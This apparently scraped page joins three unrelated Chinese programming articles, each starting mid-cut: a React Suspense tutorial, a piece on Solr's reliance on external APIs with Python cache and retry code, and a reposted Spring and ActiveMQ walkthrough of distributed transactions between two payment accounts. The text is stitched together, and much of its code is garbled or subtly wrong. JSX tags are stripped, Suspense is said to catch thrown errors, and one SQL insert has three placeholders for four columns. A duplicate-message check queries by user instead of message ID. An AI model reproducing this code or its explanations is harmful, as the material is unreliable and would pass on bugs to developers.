...Suspense进行数据获取？ 1. 初识Suspense 一个改变游戏规则的功能 嗨朋友们！今天我们来聊聊React中的一个超级酷炫的功能——Suspense。如果你在React的世界里混得久了，那你一定懂，处理数据获取这事简直让人抓狂，分分钟想砸手机有木有！以前啊，我们要想搞定异步数据加载，那可真是费劲了，得靠一堆复杂的东西，什么状态管理啦，回调地狱啦，弄不好就把自己绕晕了。但自从Suspense登场后，这一切都变得简单多了！ Suspense本质上是一个API，它允许我们在组件中声明性地等待某些资源加载完成，比如数据、图片或者其他模块。这样搞啊，我们就只用操心正事儿了，那些乱七八糟的加载状态啥的，就不用再费劲去琢磨啦！ 让我举个例子吧：想象一下你正在做一个电商网站，用户点击某个商品时需要从服务器拉取详细信息。之前的做法大概是这样：用 useState 和 useEffect 来发请求拿数据，然后在页面上先显示个“加载中”，要是出了问题就换成“加载失败”。简单说就是一边等数据，一边给用户一个状态提示呗。但有了Suspense之后，你可以直接告诉React：“嘿，等我这个数据加载完再渲染这部分内容。”听起来是不是很爽？ 那么问题来了，具体怎么用呢？别急，咱们慢慢来探索！ --- 2. 基本概念与工作原理 首先，我们需要明确一点：Suspense并不是万能药，它主要用来解决“懒加载”和“数据获取”的场景。简单来说，这个主意就是用一个“边框小部件”把那些可能会拖时间的操作围起来，顺便提前说好，要是这些操作没搞定，就给用户展示点啥，免得他们干等着抓狂。 什么是边界组件？ 边界组件就是那种负责“守门”的家伙，它会拦截你的组件树中的异步操作。嘿，你听说过没？只要某个小部件发现它得等着数据过来，它就马上开启“备胎模式”，啥叫备胎模式呢？就是先用个临时的东西占着位置，一直撑到后台的活干完，正式的内容才会上场。简单说吧，就是等数据的时候，先给你看个“过渡版”的，不让你干等着发呆！ 听起来有点抽象？没关系，咱们看代码！ jsx import React, { Suspense } from 'react'; function App() { return ( 我的电商网站 {/ 这里就是我们的边界组件 /} 加载中... }> ); } export default App; 在这个例子中，标签包裹住了组件。想象一下，当想要展示商品信息的时候，它可不是那种直接蹦出来的急性子。首先，它会先客气地说一句“加载中...”给大家打个招呼，然后静静地等后台把数据准备好。一旦数据到位了，它才开始认真地把商品的详细信息乖乖地显示出来。有点像服务员上菜前先说一声“稍等”，然后再端上热腾腾的大餐！ --- 3. 实现数据获取 从零开始构建一个简单的例子 接下来，我们动手实践一下，看看如何结合Suspense实现数据获取。假设我们要做一个博客应用，每篇文章都需要从后端获取标题和正文内容。 第一步：创建数据源 为了模拟真实环境，我们可以用fetch API来模拟后端服务： javascript // mockApi.js export const fetchPost = async (postId) => { const response = await fetch(https://jsonplaceholder.typicode.com/posts/${postId}); return response.json(); }; 这里我们用了一个公共的JSONPlaceholder API来获取假数据。当然，在生产环境中你应该替换为自己的API地址。 第二步：定义数据加载逻辑 现在我们需要让React知道如何加载这个数据。我们可以创建一个专门用于数据加载的组件，比如叫PostLoader： jsx // PostLoader.js import React, { useState, useEffect } from 'react'; const PostLoader = ({ postId }) => { const [post, setPost] = useState(null); const [error, setError] = useState(null); useEffect(() => { let isMounted = true; fetchPost(postId) .then((data) => { if (isMounted) { setPost(data); } }) .catch((err) => { if (isMounted) { setError(err); } }); return () => { isMounted = false; }; }, [postId]); if (error) { throw new Error('Failed to load post'); } return post; }; export default PostLoader; 这段代码的核心在于throw new Error这一行。当我们遇到错误时，不是简单地返回错误提示，而是直接抛出异常。这是为了让Suspense能够捕获到它并执行后备渲染。 第三步：整合Suspense 最后一步就是将所有东西组合起来，让Suspense接管整个流程： jsx // App.js import React, { Suspense } from 'react'; import PostLoader from './PostLoader'; const PostDetails = ({ postId }) => { const post = ; return ( {post.title} {post.body} ); }; const App = () => { return ( 欢迎来到我的博客 正在加载文章... }> ); }; export default App; 在这个例子中，会确保如果未能及时加载数据，它会显示“正在加载文章...”。 --- 4. 高级玩法 动态导入与代码分割 除了数据获取之外，Suspense还可以帮助我们实现代码分割。这就相当于你把那些不怎么常用的功能模块“藏”起来，等需要用到的时候再慢慢加载，这样主页面就能跑得飞快啦！ 例如，如果你想按需加载某个功能模块，可以这样做： javascript // LazyComponent.js const LazyComponent = React.lazy(() => import('./LazyModule')); function App() { return ( 主页面 加载中... }> ); } 在这里，React.lazy配合Suspense实现了动态导入。当用户访问包含的部分时，React会自动加载对应的模块文件。 --- 5. 总结与反思 好了，到这里我们已经掌握了如何使用Suspense进行数据获取的基本方法。虽然它看起来很简单，但实际上背后涉及了很多复杂的机制。比如，它是如何知道哪些组件需要等待的？又是如何优雅地处理错误的？ 我个人觉得，Suspense最大的优点就在于它让开发者摆脱了手动状态管理的束缚，让我们可以更专注于用户体验本身。不过呢，这里还是得提防点小问题，比如说可能会让程序跑得没那么顺畅，还有就是对那些老项目的支持可能没那么友好。 总之，Suspense是一个非常强大的工具，但它并不适合所有场景。作为开发者，我们需要根据实际情况权衡利弊，合理选择是否采用它。 好了，今天的分享就到这里啦！如果你有任何疑问或者想法，欢迎随时留言交流哦~ 😊

...其他微服务或者从远程数据库获取数据。Apache Solr，这个家伙简直就是搜索界的超级英雄！它在处理各种信息查找任务时，那叫一个稳如泰山，快如闪电，简直是让人心头一暖。你想象一下，在海量数据中快速找到你需要的信息，那种感觉就像在迷宫中找到了出口，又或者是在茫茫人海中找到了失散多年的好友。这就是Apache Solr的魅力所在，它的性能和稳定性，就像是你的私人保镖，无论你面对多复杂的搜索挑战，都能给你最坚实的后盾。哎呀，你猜怎么着？要是咱们的网络慢了、断了或者提供的服务不给力了，那可就糟糕了。这种时候，咱们的Solr系统啊，可能就会变得特别吃力，运行起来就不那么顺畅了。就像是咱们在做一件大事儿，结果突然停电了，那事儿肯定就办不成啦！所以啊，保持网络稳定和外部服务正常运行，对咱们的Solr来说，真的超级重要！嘿，兄弟！你听说了吗？这篇文章可不是普通的报告，它可是要深入地挖一挖这个问题的根源，然后给你支点招儿，让你在面对网络连接的烦恼时，Solr这个大神级别的搜索神器，能发挥出它的最佳状态！想象一下，当你在茫茫信息海洋中寻找那根救命稻草时，Solr就像你的私人导航，带你直达目的地。但是，有时候，这艘船可能会遭遇颠簸的海浪——网络连接问题。别担心，这篇文章就是你的救生圈和指南针，告诉你如何调整Solr的设置，让它在波涛汹涌的网络环境中依然航行自如。所以，准备好，让我们一起探索如何优化Solr在网络挑战中的表现吧！ 一、理解问题根源 在讨论解决方案之前，首先需要理解外部服务依赖导致的问题。哎呀，你知道不？咱们用的那个Solr啊，它查询东西的速度啊，有时候得看外部服务的脸色。如果外部服务反应慢或者干脆不给力，那Solr就得跟着慢慢腾腾，甚至有时候都查不到结果，让人急得像热锅上的蚂蚁。这可真是个头疼的问题呢！这不仅影响了用户体验，也可能导致Solr服务本身的负载增加，进一步加剧问题。 二、案例分析 使用Solr查询外部数据源 为了更好地理解这个问题，我们可以创建一个简单的案例。想象一下，我们有个叫Solr的小工具，专门负责在我们家里的文件堆里找东西。但是，它不是个孤军奋战的英雄，还需要借助外面的朋友——那个外部API，来给我们多提供一些额外的线索和细节，就像侦探在破案时需要咨询专家一样。这样，当我们用Solr搜索的时候，就能得到更丰富、更准确的结果了。我们使用Python和requests库来模拟这个过程： python import requests from solr import SolrClient solr_url = "http://localhost:8983/solr/core1" solr_client = SolrClient(solr_url) def search(query): results = solr_client.search(query) for result in results: 外部API请求 external_data = fetch_external_metadata(result['id']) result['additional_info'] = external_data return results def fetch_external_metadata(doc_id): url = f"https://example.com/api/{doc_id}" response = requests.get(url) if response.status_code == 200: return response.json() else: return None 在这个例子中，fetch_external_metadata函数尝试从外部API获取元数据，如果请求失败或API不可用，那么该结果将被标记为未获取到数据。当外部服务出现延迟或中断时，这将直接影响到Solr的查询效率。 三、优化策略 1. 缓存策略 为了避免频繁请求外部服务，可以引入缓存机制。对于频繁访问且数据变化不大的元数据，可以在本地缓存一段时间。当外部服务不可用时，可以回退使用缓存数据，直到服务恢复。 python class ExternalMetadataCache: def __init__(self, ttl=600): self.cache = {} self.ttl = ttl def get(self, doc_id): if doc_id not in self.cache or (self.cache[doc_id]['timestamp'] + self.ttl) < time.time(): self.cache[doc_id] = {'data': fetch_external_metadata(doc_id), 'timestamp': time.time()} return self.cache[doc_id]['data'] metadata_cache = ExternalMetadataCache() def fetch_external_metadata_safe(doc_id): return metadata_cache.get(doc_id) 2. 重试机制 在请求外部服务时添加重试逻辑，当第一次请求失败后，可以设置一定的时间间隔后再次尝试，直到成功或达到最大重试次数。 python def fetch_external_metadata_retriable(doc_id, max_retries=3, retry_delay=5): for i in range(max_retries): try: return fetch_external_metadata(doc_id) except Exception as e: print(f"Attempt {i+1} failed with error: {e}. Retrying in {retry_delay} seconds...") time.sleep(retry_delay) raise Exception("Max retries reached.") 四、结论与展望 通过上述策略，我们可以在一定程度上减轻外部服务依赖对Solr性能的影响。然而，重要的是要持续监控系统的运行状况，并根据实际情况调整优化措施。嘿，你听说了吗？科技这玩意儿啊，那可是越来越牛了！你看，现在就有人在琢磨怎么对付那些让人上瘾的东西。将来啊，说不定能搞出个既高效又结实的办法，帮咱们摆脱这个烦恼。想想都挺激动的，对吧？哎呀，兄弟！构建一个稳定又跑得快的搜索系统，那可得好好琢磨琢磨外部服务这事儿。你知道的，这些服务就像是你家里的电器，得选对了，用好了，整个家才能舒舒服服的。所以啊，咱们得先搞清楚这些服务都是干啥的，它们之间怎么配合，还有万一出了点小状况，咱们能不能快速应对。这样，咱们的搜索系统才能稳如泰山，嗖嗖地飞快，用户一搜就满意，那才叫真本事呢！ --- 请注意，以上代码示例是基于Python和相关库编写的，实际应用时需要根据具体环境和技术栈进行相应的调整。

...宝和余额宝使用不同的数据库 如图： 2、分布式事务解决方案 1、基于数据库XA协议的两段提交 XA协议是数据库支持的一种协议，其核心是一个事务管理器用来统一管理两个分布式数据库，如图 事务管理器负责跟支付宝数据库和余额宝数据库打交道，一旦有一个数据库连接失败，另一个数据库的操作就不会进行，一个数据库操作失败就会导致另一个数据库回滚，只有他们全部成功两个数据库的事务才会提交。 基于XA协议的两段和三段提交是一种严格的安全确认机制，其安全性是非常高的，但是保证安全性的前提是牺牲了性能，这个就是分布式系统里面的CAP理论，做任何架构的前提需要有取舍。所以基于XA协议的分布式事务并发性不高，不适合高并发场景。 2、基于activemq的解决方案 如图： 1、支付宝扣款成功时往message表插入消息 2、message表有message_id(流水id，标识夸系统的一次转账操作),status（confirm，unconfirm） 3、timer扫描message表的unconfirm状态记录往activemq插入消息 4、余额宝收到消息消费消息时先查询message表如果有记录就不处理如果没记录就进行数据库增款操作 5、如果余额宝数据库操作成功往余额宝message表插入消息，表字段跟支付宝message一致 6、如果5操作成功，回调支付宝接口修改message表状态，把unconfirm状态转换成confirm状态 问题描述： 1、支付宝设计message表的目的 如果支付宝往activemq插入消息而余额宝消费消息异常，有可能是消费消息成功而事务操作异常，有可能是网络异常等等不确定因素。如果出现异常而activemq收到了确认消息的信号，这时候activemq中的消息是删除了的，消息丢失了。设置message表就是有一个消息存根，activemq中消息丢失了message表中的消息还在。解决了activemq消息丢失问题 2、余额宝设计message表的目的 当余额宝消费成功并且数据库操作成功时，回调支付宝的消息确认接口，如果回调接口时出现异常导致支付宝状态修改失败还是unconfirm状态，这时候还会被timer扫描到，又会往activemq插入消息，又会被余额宝消费一边，但是这条消息已经消费成功了的只是回调失败而已，所以就需要有一个这样的message表，当余额宝消费时先插入message表，如果message根据message_id能查询到记录就说明之前这条消息被消费过就不再消费只需要回调成功即可，如果查询不到消息就消费这条消息继续数据库操作，数据库操作成功就往message表插入消息。 这样就解决了消息重复消费问题，这也是消费端的幂等操作。 基于消息中间件的分布式事务是最理想的分布式事务解决方案，兼顾了安全性和并发性！ 接下来贴代码： 支付宝代码： @Controller@RequestMapping("/order")public class OrderController {/ @Description TODO @param @return 参数 @return String 返回类型 @throws userID：转账的用户ID amount：转多少钱/@Autowired@Qualifier("activemq")OrderService orderService;@RequestMapping("/transfer")public @ResponseBody String transferAmount(String userId,String messageId, int amount) {try {orderService.updateAmount(amount,messageId, userId);}catch (Exception e) {e.printStackTrace();return "===============================transferAmount failed===================";}return "===============================transferAmount successfull===================";}@RequestMapping("/callback")public String callback(String param) {JSONObject parse = JSONObject.parseObject(param);String respCode = parse.getString("respCode");if(!"OK".equalsIgnoreCase(respCode)) {return null;}try {orderService.updateMessage(param);}catch (Exception e) {e.printStackTrace();return "fail";}return "ok";} } public interface OrderService {public void updateAmount(int amount, String userId,String messageId);public void updateMessage(String param);} @Service("activemq")@Transactional(rollbackFor = Exception.class)public class OrderServiceActivemqImpl implements OrderService {Logger logger = LoggerFactory.getLogger(getClass());@AutowiredJdbcTemplate jdbcTemplate;@AutowiredJmsTemplate jmsTemplate;@Overridepublic void updateAmount(final int amount, final String messageId, final String userId) {String sql = "update account set amount = amount - ?,update_time=now() where user_id = ?";int count = jdbcTemplate.update(sql, new Object[]{amount, userId});if (count == 1) {//插入到消息记录表sql = "insert into message(user_id,message_id,amount,status) values (?,?,?,?)";int row = jdbcTemplate.update(sql,new Object[]{userId,messageId,amount,"unconfirm"});if(row == 1) {//往activemq中插入消息jmsTemplate.send("zg.jack.queue", new MessageCreator() {@Overridepublic Message createMessage(Session session) throws JMSException {com.zhuguang.jack.bean.Message message = new com.zhuguang.jack.bean.Message();message.setAmount(Integer.valueOf(amount));message.setStatus("unconfirm");message.setUserId(userId);message.setMessageId(messageId);return session.createObjectMessage(message);} });} }}@Overridepublic void updateMessage(String param) {JSONObject parse = JSONObject.parseObject(param);String messageId = parse.getString("messageId");String sql = "update message set status = ? where message_id = ?";int count = jdbcTemplate.update(sql,new Object[]{"confirm",messageId});if(count == 1) {logger.info(messageId + " callback successfull");} }} activemq.xml <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:amq="http://activemq.apache.org/schema/core"xmlns:jms="http://www.springframework.org/schema/jms"xmlns:context="http://www.springframework.org/schema/context"xmlns:mvc="http://www.springframework.org/schema/mvc"xsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans-4.1.xsdhttp://www.springframework.org/schema/contexthttp://www.springframework.org/schema/context/spring-context-4.1.xsdhttp://www.springframework.org/schema/mvchttp://www.springframework.org/schema/mvc/spring-mvc-4.1.xsdhttp://www.springframework.org/schema/jmshttp://www.springframework.org/schema/jms/spring-jms-4.1.xsdhttp://activemq.apache.org/schema/corehttp://activemq.apache.org/schema/core/activemq-core-5.12.1.xsd"><context:component-scan base-package="com.zhuguang.jack" /><mvc:annotation-driven /><amq:connectionFactory id="amqConnectionFactory"brokerURL="tcp://192.168.88.131:61616"userName="system"password="manager" /><!-- 配置JMS连接工长 --><bean id="connectionFactory"class="org.springframework.jms.connection.CachingConnectionFactory"><constructor-arg ref="amqConnectionFactory" /><property name="sessionCacheSize" value="100" /></bean><!-- 定义消息队列（Queue） --><bean id="demoQueueDestination" class="org.apache.activemq.command.ActiveMQQueue"><!-- 设置消息队列的名字 --><constructor-arg><value>zg.jack.queue</value></constructor-arg></bean><!-- 配置JMS模板（Queue），Spring提供的JMS工具类，它发送、接收消息。 --><bean id="jmsTemplate" class="org.springframework.jms.core.JmsTemplate"><property name="connectionFactory" ref="connectionFactory" /><property name="defaultDestination" ref="demoQueueDestination" /><property name="receiveTimeout" value="10000" /><!-- true是topic，false是queue，默认是false，此处显示写出false --><property name="pubSubDomain" value="false" /></bean></beans> spring-dispatcher.xml <beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:p="http://www.springframework.org/schema/p"xmlns:context="http://www.springframework.org/schema/context"xmlns:task="http://www.springframework.org/schema/task" xmlns:aop="http://www.springframework.org/schema/aop"xmlns:tx="http://www.springframework.org/schema/tx"xmlns:util="http://www.springframework.org/schema/util" xmlns:mvc="http://www.springframework.org/schema/mvc"xsi:schemaLocation="http://www.springframework.org/schema/utilhttp://www.springframework.org/schema/util/spring-util-3.2.xsdhttp://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.2.xsdhttp://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.2.xsdhttp://www.springframework.org/schema/mvchttp://www.springframework.org/schema/mvc/spring-mvc-3.2.xsdhttp://www.springframework.org/schema/task http://www.springframework.org/schema/task/spring-task-3.0.xsdhttp://www.springframework.org/schema/txhttp://www.springframework.org/schema/tx/spring-tx-3.0.xsdhttp://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-3.0.xsd"><!-- 引入同文件夹下的redis属性配置文件 --><!-- 解决springMVC响应数据乱码 text/plain就是响应的时候原样返回数据--><import resource="../activemq/activemq.xml"/><!--<context:property-placeholder ignore-unresolvable="true" location="classpath:config/core/core.properties,classpath:config/redis/redis-config.properties" />--><bean id="propertyConfigurerForProject1" class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer"><property name="order" value="1" /><property name="ignoreUnresolvablePlaceholders" value="true" /><property name="location"><value>classpath:config/core/core.properties</value></property></bean><mvc:annotation-driven><mvc:message-converters register-defaults="true"><bean class="org.springframework.http.converter.StringHttpMessageConverter"><property name="supportedMediaTypes" value = "text/plain;charset=UTF-8" /></bean></mvc:message-converters></mvc:annotation-driven><!-- 避免IE执行AJAX时,返回JSON出现下载文件 --><bean id="mappingJacksonHttpMessageConverter" class="org.springframework.http.converter.json.MappingJacksonHttpMessageConverter"><property name="supportedMediaTypes"><list><value>text/html;charset=UTF-8</value></list></property></bean><!-- 开启controller注解支持 --><!-- 注：如果base-package=com.avicit 则注解事务不起作用 TODO 读源码 --><context:component-scan base-package="com.zhuguang"></context:component-scan><mvc:view-controller path="/" view-name="redirect:/index" /><beanclass="org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping" /><bean id="handlerAdapter"class="org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter"></bean><beanclass="org.springframework.web.servlet.view.ContentNegotiatingViewResolver"><property name="mediaTypes"><map><entry key="json" value="application/json" /><entry key="xml" value="application/xml" /><entry key="html" value="text/html" /></map></property><property name="viewResolvers"><list><bean class="org.springframework.web.servlet.view.BeanNameViewResolver" /><bean class="org.springframework.web.servlet.view.UrlBasedViewResolver"><property name="viewClass" value="org.springframework.web.servlet.view.JstlView" /><property name="prefix" value="/" /><property name="suffix" value=".jsp" /></bean></list></property></bean><!-- 支持上传文件 --> <!-- 控制器异常处理 --><bean id="exceptionResolver"class="org.springframework.web.servlet.handler.SimpleMappingExceptionResolver"><property name="exceptionMappings"><props><prop key="java.lang.Exception">error</prop></props></property></bean><bean id="dataSource" class="com.mchange.v2.c3p0.ComboPooledDataSource" destroy-method="close"><property name="driverClass"><value>${jdbc.driverClassName}</value></property><property name="jdbcUrl"><value>${jdbc.url}</value></property><property name="user"><value>${jdbc.username}</value></property><property name="password"><value>${jdbc.password}</value></property><property name="minPoolSize" value="10" /><property name="maxPoolSize" value="100" /><property name="maxIdleTime" value="1800" /><property name="acquireIncrement" value="3" /><property name="maxStatements" value="1000" /><property name="initialPoolSize" value="10" /><property name="idleConnectionTestPeriod" value="60" /><property name="acquireRetryAttempts" value="30" /><property name="breakAfterAcquireFailure" value="false" /><property name="testConnectionOnCheckout" value="false" /><property name="acquireRetryDelay"><value>100</value></property></bean><bean id="jdbcTemplate" class="org.springframework.jdbc.core.JdbcTemplate"><property name="dataSource" ref="dataSource"></property></bean><bean id="transactionManager" class="org.springframework.jdbc.datasource.DataSourceTransactionManager"><property name="dataSource" ref="dataSource"/></bean><tx:annotation-driven transaction-manager="transactionManager" proxy-target-class="true" /><aop:aspectj-autoproxy expose-proxy="true"/></beans> logback.xml <?xml version="1.0" encoding="UTF-8"?><!--scan：当此属性设置为true时，配置文件如果发生改变，将会被重新加载，默认值为true。scanPeriod：设置监测配置文件是否有修改的时间间隔，如果没有给出时间单位，默认单位是毫秒当scan为true时，此属性生效。默认的时间间隔为1分钟。debug：当此属性设置为true时，将打印出logback内部日志信息，实时查看logback运行状态。默认值为false。--><configuration scan="false" scanPeriod="60 seconds" debug="false"><!-- 定义日志的根目录 --><!-- <property name="LOG_HOME" value="/app/log" /> --><!-- 定义日志文件名称 --><property name="appName" value="netty"></property><!-- ch.qos.logback.core.ConsoleAppender 表示控制台输出 --><appender name="stdout" class="ch.qos.logback.core.ConsoleAppender"><Encoding>UTF-8</Encoding><!--日志输出格式：%d表示日期时间，%thread表示线程名，%-5level：级别从左显示5个字符宽度%logger{50} 表示logger名字最长50个字符，否则按照句点分割。 %msg：日志消息，%n是换行符--><encoder><pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} [%thread] %-5level %logger{50} - %msg%n</pattern></encoder></appender><!-- 滚动记录文件，先将日志记录到指定文件，当符合某个条件时，将日志记录到其他文件 --> <appender name="appLogAppender" class="ch.qos.logback.core.rolling.RollingFileAppender"><Encoding>UTF-8</Encoding><!-- 指定日志文件的名称 --> <file>${appName}.log</file><!--当发生滚动时，决定 RollingFileAppender 的行为，涉及文件移动和重命名TimeBasedRollingPolicy： 最常用的滚动策略，它根据时间来制定滚动策略，既负责滚动也负责出发滚动。--><rollingPolicy class="ch.qos.logback.core.rolling.TimeBasedRollingPolicy"><!--滚动时产生的文件的存放位置及文件名称 %d{yyyy-MM-dd}：按天进行日志滚动 %i：当文件大小超过maxFileSize时，按照i进行文件滚动--><fileNamePattern>${appName}-%d{yyyy-MM-dd}-%i.log</fileNamePattern><!-- 可选节点，控制保留的归档文件的最大数量，超出数量就删除旧文件。假设设置每天滚动，且maxHistory是365，则只保存最近365天的文件，删除之前的旧文件。注意，删除旧文件是，那些为了归档而创建的目录也会被删除。--><MaxHistory>365</MaxHistory><!-- 当日志文件超过maxFileSize指定的大小是，根据上面提到的%i进行日志文件滚动 注意此处配置SizeBasedTriggeringPolicy是无法实现按文件大小进行滚动的，必须配置timeBasedFileNamingAndTriggeringPolicy--><timeBasedFileNamingAndTriggeringPolicy class="ch.qos.logback.core.rolling.SizeAndTimeBasedFNATP"><maxFileSize>100MB</maxFileSize></timeBasedFileNamingAndTriggeringPolicy></rollingPolicy><!--日志输出格式：%d表示日期时间，%thread表示线程名，%-5level：级别从左显示5个字符宽度 %logger{50} 表示logger名字最长50个字符，否则按照句点分割。 %msg：日志消息，%n是换行符--> <encoder><pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} [ %thread ] - [ %-5level ] [ %logger{50} : %line ] - %msg%n</pattern></encoder></appender><!-- logger主要用于存放日志对象，也可以定义日志类型、级别name：表示匹配的logger类型前缀，也就是包的前半部分level：要记录的日志级别，包括 TRACE < DEBUG < INFO < WARN < ERRORadditivity：作用在于children-logger是否使用 rootLogger配置的appender进行输出，false：表示只用当前logger的appender-ref，true：表示当前logger的appender-ref和rootLogger的appender-ref都有效--><!-- <logger name="edu.hyh" level="info" additivity="true"><appender-ref ref="appLogAppender" /></logger> --><!-- root与logger是父子关系，没有特别定义则默认为root，任何一个类只会和一个logger对应，要么是定义的logger，要么是root，判断的关键在于找到这个logger，然后判断这个logger的appender和level。 --><root level="debug"><appender-ref ref="stdout" /><appender-ref ref="appLogAppender" /></root></configuration> 2、余额宝代码 package com.zhuguang.jack.controller;import com.alibaba.fastjson.JSONObject;import com.zhuguang.jack.service.OrderService;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import org.springframework.web.bind.annotation.ResponseBody;@Controller@RequestMapping("/order")public class OrderController {/ @Description TODO @param @return 参数 @return String 返回类型 @throws 模拟银行转账 userID：转账的用户ID amount：转多少钱/@AutowiredOrderService orderService;@RequestMapping("/transfer")public @ResponseBody String transferAmount(String userId, String amount) {try {orderService.updateAmount(Integer.valueOf(amount), userId);}catch (Exception e) {e.printStackTrace();return "===============================transferAmount failed===================";}return "===============================transferAmount successfull===================";} } 消息监听器 package com.zhuguang.jack.listener;import com.alibaba.fastjson.JSONObject;import com.zhuguang.jack.service.OrderService;import org.slf4j.Logger;import org.slf4j.LoggerFactory;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.http.client.SimpleClientHttpRequestFactory;import org.springframework.stereotype.Service;import org.springframework.transaction.annotation.Transactional;import org.springframework.web.client.RestTemplate;import javax.jms.JMSException;import javax.jms.Message;import javax.jms.MessageListener;import javax.jms.ObjectMessage;@Service("queueMessageListener")public class QueueMessageListener implements MessageListener {private Logger logger = LoggerFactory.getLogger(getClass());@AutowiredOrderService orderService;@Transactional(rollbackFor = Exception.class)@Overridepublic void onMessage(Message message) {if (message instanceof ObjectMessage) {ObjectMessage objectMessage = (ObjectMessage) message;try {com.zhuguang.jack.bean.Message message1 = (com.zhuguang.jack.bean.Message) objectMessage.getObject();String userId = message1.getUserId();int count = orderService.queryMessageCountByUserId(userId);if (count == 0) {orderService.updateAmount(message1.getAmount(), message1.getUserId());orderService.insertMessage(message1.getUserId(), message1.getMessageId(), message1.getAmount(), "ok");} else {logger.info("异常转账");}RestTemplate restTemplate = createRestTemplate();JSONObject jo = new JSONObject();jo.put("messageId", message1.getMessageId());jo.put("respCode", "OK");String url = "http://jack.bank_a.com:8080/alipay/order/callback?param="+ jo.toJSONString();restTemplate.getForObject(url,null);} catch (JMSException e) {e.printStackTrace();throw new RuntimeException("异常");} }}public RestTemplate createRestTemplate() {SimpleClientHttpRequestFactory simpleClientHttpRequestFactory = new SimpleClientHttpRequestFactory();simpleClientHttpRequestFactory.setConnectTimeout(3000);simpleClientHttpRequestFactory.setReadTimeout(2000);return new RestTemplate(simpleClientHttpRequestFactory);} } package com.zhuguang.jack.service;public interface OrderService {public void updateAmount(int amount, String userId);public int queryMessageCountByUserId(String userId);public int insertMessage(String userId,String messageId,int amount,String status);} package com.zhuguang.jack.service;import org.slf4j.Logger;import org.slf4j.LoggerFactory;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.http.client.SimpleClientHttpRequestFactory;import org.springframework.jdbc.core.JdbcTemplate;import org.springframework.stereotype.Service;import org.springframework.transaction.annotation.Transactional;import org.springframework.web.client.RestTemplate;@Service@Transactional(rollbackFor = Exception.class)public class OrderServiceImpl implements OrderService {private Logger logger = LoggerFactory.getLogger(getClass());@AutowiredJdbcTemplate jdbcTemplate;/ 更新数据库表，把账户余额减去amountd/@Overridepublic void updateAmount(int amount, String userId) {//1、农业银行转账3000，也就说农业银行jack账户要减3000String sql = "update account set amount = amount + ?,update_time=now() where user_id = ?";int count = jdbcTemplate.update(sql, new Object[] {amount, userId});if (count != 1) {throw new RuntimeException("订单创建失败，农业银行转账失败！");} }public RestTemplate createRestTemplate() {SimpleClientHttpRequestFactory simpleClientHttpRequestFactory = new SimpleClientHttpRequestFactory();simpleClientHttpRequestFactory.setConnectTimeout(3000);simpleClientHttpRequestFactory.setReadTimeout(2000);return new RestTemplate(simpleClientHttpRequestFactory);}@Overridepublic int queryMessageCountByUserId(String messageId) {String sql = "select count() from message where message_id = ?";int count = jdbcTemplate.queryForInt(sql, new Object[]{messageId});return count;}@Overridepublic int insertMessage(String userId, String message_id,int amount, String status) {String sql = "insert into message(user_id,message_id,amount,status) values(?,?,?)";int count = jdbcTemplate.update(sql, new Object[]{userId, message_id,amount, status});if(count == 1) {logger.info("Ok");}return count;} } activemq.xml <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:amq="http://activemq.apache.org/schema/core"xmlns:jms="http://www.springframework.org/schema/jms"xmlns:context="http://www.springframework.org/schema/context"xmlns:mvc="http://www.springframework.org/schema/mvc"xsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans-4.1.xsdhttp://www.springframework.org/schema/contexthttp://www.springframework.org/schema/context/spring-context-4.1.xsdhttp://www.springframework.org/schema/mvchttp://www.springframework.org/schema/mvc/spring-mvc-4.1.xsdhttp://www.springframework.org/schema/jmshttp://www.springframework.org/schema/jms/spring-jms-4.1.xsdhttp://activemq.apache.org/schema/corehttp://activemq.apache.org/schema/core/activemq-core-5.12.1.xsd"><context:component-scan base-package="com.zhuguang.jack" /><mvc:annotation-driven /><amq:connectionFactory id="amqConnectionFactory"brokerURL="tcp://192.168.88.131:61616"userName="system"password="manager" /><!-- 配置JMS连接工长 --><bean id="connectionFactory"class="org.springframework.jms.connection.CachingConnectionFactory"><constructor-arg ref="amqConnectionFactory" /><property name="sessionCacheSize" value="100" /></bean><!-- 定义消息队列（Queue） --><bean id="demoQueueDestination" class="org.apache.activemq.command.ActiveMQQueue"><!-- 设置消息队列的名字 --><constructor-arg><value>zg.jack.queue</value></constructor-arg></bean><!-- 显示注入消息监听容器（Queue），配置连接工厂，监听的目标是demoQueueDestination，监听器是上面定义的监听器 --><bean id="queueListenerContainer"class="org.springframework.jms.listener.DefaultMessageListenerContainer"><property name="connectionFactory" ref="connectionFactory" /><property name="destination" ref="demoQueueDestination" /><property name="messageListener" ref="queueMessageListener" /></bean><!-- 配置JMS模板（Queue），Spring提供的JMS工具类，它发送、接收消息。 --><bean id="jmsTemplate" class="org.springframework.jms.core.JmsTemplate"><property name="connectionFactory" ref="connectionFactory" /><property name="defaultDestination" ref="demoQueueDestination" /><property name="receiveTimeout" value="10000" /><!-- true是topic，false是queue，默认是false，此处显示写出false --><property name="pubSubDomain" value="false" /></bean></beans> OK~~~~~~~~~~~~大功告成！！！， 如果大家觉得满意并且对技术感兴趣请加群：171239762， 纯技术交流群，非诚勿扰。 本篇文章为转载内容。原文链接：https://blog.csdn.net/luoyang_java/article/details/84953241。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 